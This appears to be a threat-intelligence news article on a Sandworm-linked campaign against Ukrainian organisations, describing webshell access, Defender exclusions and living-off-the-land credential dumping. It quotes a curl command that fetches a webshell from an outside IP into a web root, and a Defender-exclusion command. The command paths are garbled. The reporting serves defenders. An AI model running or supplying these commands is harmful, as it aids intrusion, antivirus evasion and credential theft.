“`html
Ukrainian governmental bodies persist in confronting unyielding digital threats from Russian-affiliated hostile entities utilizing intricate evasion strategies to ensure ongoing network entry.
Recent inquiries have revealed synchronized campaigns aimed at vital infrastructure and state organizations, with perpetrators employing advanced methodologies that bypass conventional security measures.
These initiatives signify a notable escalation in targeting techniques, emphasizing credential gathering and sensitive data extraction rather than immediate destructive actions.
The assaults illustrate a tactical transition towards extended dwell times within networks, allowing threat agents to perform thorough reconnaissance and maintain a discreet presence for an extended duration.
Symantec analysts and investigators detected two significant intrusion events covering a two-month operation against a large business services firm and a week-long initiative targeting local governmental infrastructure.
The assailants exhibit remarkable operational security awareness, minimizing malware application while relying chiefly on legitimate Windows administrative tools and dual-use utilities to steer clear of detection.
The operation seems associated with Sandworm, a Russian military intelligence unit within the GRU recognized for devastating attacks on essential infrastructure such as power grids and satellite communication networks.
The initial compromise occurred via webshell deployment on publicly accessible servers, likely taking advantage of unpatched vulnerabilities. The attackers employed the Localolive webshell to establish a lasting backdoor entry, facilitating remote command execution capabilities.
Living-Off-the-Land Credential Harvesting Mechanisms
The intricate evasion tactics utilized by these hostile agents reflect their comprehension of contemporary security implementations.
After achieving initial access on June 27, 2025, the attackers promptly executed reconnaissance commands using built-in Windows utilities:
cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:inetpubwwwrootaspnet_clientservice.aspx
powershell Add-MpPreference -ExclusionPath CSIDL_PROFILEdownloadsPerpetrators intentionally deactivated Windows Defender scanning for the Downloads directory, which necessitated administrative privileges.
They later generated scheduled tasks that executed every half hour using the legitimate rundll32.exe with comsvcs.dll to carry out memory dumps, extracting credentials saved in process memory.
The threat agents specifically focused on KeePass password vault processes through enumeration commands, showcasing precise targeting of credential repositories.
Advanced evasion continued through the application of the Windows Resource Leak Diagnostic tool (rdrleakdiag) for memory dumping tasks, a rarely utilized technique aimed at evading security monitoring systems.
Exfiltration of the registry hive through native reg.exe commands permitted further credential and configuration data extraction.
The campaign demonstrates threat actors prioritizing discretion over speed, utilizing legitimate administrative tools to maintain ambiguity in attribution while systematically gathering sensitive organizational data throughout prolonged network access phases.
“`